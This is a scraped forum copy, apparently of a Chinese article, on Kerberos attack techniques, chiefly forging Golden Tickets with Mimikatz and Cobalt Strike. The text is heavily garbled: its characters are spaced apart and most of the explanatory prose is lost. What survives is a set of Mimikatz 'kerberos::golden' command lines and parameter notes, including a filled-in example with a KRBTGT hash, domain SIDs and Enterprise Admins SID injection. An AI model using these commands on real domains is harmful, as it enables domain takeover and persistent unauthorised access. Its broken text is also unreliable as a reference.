[21846] 2021-04-06_kerberos认证下的一些攻击手法

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-04-06_kerberos认证下的一些攻击手法 k e r b e r o s L e m o n S e c   2 0 2 1 - 0 4 - 0 6   1 . 0   T G T :   . T G T 1 . A S - R E Q A S - R E P 2 . k r b t g t h a s h K D C   H a s h 3 . T G T T G S - R E Q K e r b e r o s
1 . 1   K R B T G T h a s h K e r b e r o s T G T   K e r b e r o s K e r b e r o s K R B T G T T G T K D C T G T K R B T G T K D C 1 . 2 . S I D 3 . K R B T G T N T L M 4 .
使 c o b a l t   s t r i k e T G T
使 / 使 2 0 K D C T G T 使 A c t i v e   D i r e c t o r y K D C K e r b e r o s
使 * 使 K e r b e r o s T G T 1 0 1 0 1 0 K R B T G T K R B T G T
使 使 使 1 . 2   M i m i k a t z M i m i k a t z S m a r t C a r d D C T G T T G T M i m i k a t z K e r b e r o s k e r b e r o s   : :   g o l d e n   /   a d m i n A D M I I N A C C O U N T N A M E   /   d o m a i n D O M A I N F Q D N   /   i d A C C O U N T R I D   /   s i d D O M A I N S I D   /   k r b t g t K R B T G T P A S S W O R D H A S H   /   p t t k e r b e r o s   : :   g o l d e n
m i m i k a t z   k e r b e r o s : : g o l d e n   / d o m a i n : < >   / s i d : < S I D >   / r c 4 : < K R B T G T   N T L M   H a s h >   / u s e r : < >   / p t t "   e x i t / d o m a i n   - - - - - l a b . a d s e c u r i t y . o r g /   s i d   - - - - S I D , S - 1 - 5 - 2 1 - 1 4 7 3 6 4 3 4 1 9 - 7 7 4 9 5 4 0 8 9 - 2 2 2 2 3 2 9 1 2 7 /   s i d s   - - -   A D / S I D E n t e r p r i s e   A d m i n s S - 1 - 5 - 2 1 - 1 4 7 3 6 4 3 4 1 9 - 7 7 4 9 5 4 0 8 9 - 5 8 7 2 3 2 9 1 2 7 - 5 1 9 Ť     /   u s e r   - - - /   g r o u p s - - - R I D R I D 访 5 1 3 , 5 1 2 , 5 2 0 , 5 1 8 , 5 1 9 /   k r b t g t - - - K D C K R B T G T N T L M T G T /   t i c k e t   -   G o l d e n   T i c k e t 便 使 使 /   p t t 使 /   p t t   -   /   t i c k e t   -   使 使 /   i d   -   R I D M i m i k a t z 5 0 0 R I D /   s t a r t o f f s e t   -   使 - 1 0 0 M i m i k a t z 0 /   e n d i n   -   使 M i m i k a t z 1 0 5 , 2 6 2 , 4 8 0 A c t i v e   D i r e c t o r y K e r b e r o s 1 0 6 0 0 /   r e n e w m a x   -   M i m i k a t z 1 0 5 , 2 6 2 , 4 8 0 A c t i v e   D i r e c t o r y K e r b e r o s 7 1 0 , 0 8 0 /   s i d s   -   A D A D R o o t D o m a i n S I D - 5 1 9 S I D A D A D A D /   a e s 1 2 8   -   A E S 1 2 8 /   a e s 2 5 6   -   A E S 2 5 6 S I D S - 1 - 5 - 2 1   < D O M A I N I D >   - 5 1 3 S I D S - 1 - 5 - 2 1   < D O M A I N I D >   - 5 1 2 S I D S - 1 - 5 - 2 1   < D O M A I N I D >   - 5 1 8 S I D S - 1 - 5 - 2 1   < D O M A I N I D >   - 5 1 9 A D 使 /   s i d s
2 . 0     /   P 1 2   /   3 4 S I D S - 1 - 5 - 2 1   < D O M A I N I D >   - 5 2 0 k e r b e r o s   : :   g o l d e n   /   u s e r A D M I I N A C C O U N T N A M E   /   d o m a i n D O M A I N F Q D N   /   i d A C C O U N T R I D   /   s i d D O M A I N S I D   /   k r b t g t K R B T G T P A S S W O R D H A S H   /   p t t . m i m i k a t z   k e r b e r o s : : g o l d e n     / u s e r : D a r t h V a d e r     / d o m a i n : r d . l a b . a d s e c u r i t y . o r g     / i d : 5 0 0   / s i d : S - 1 - 5 - 2 1 - 1 3 5 3 8 0 1 6 1 - 1 0 2 1 9 1 1 3 8 - 5 8 1 3 1 1 2 0 2   / k r b t g t : 1 3 0 2 6 0 5 5 d 0 1 f 2 3 5 d 6 7 6 3 4 e 1 0 9 d a 0 3 3 2 1     / p t t   e x i t A S - R E Q A S - R E T G S - R E Q T G S - R E P T G S
/ K e r b e r o s T G S K e r b e r o s K e r b e r o s
使 / T G T 访 K e r b e r o s T G S K e r b e r o s K R B T G T S A M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则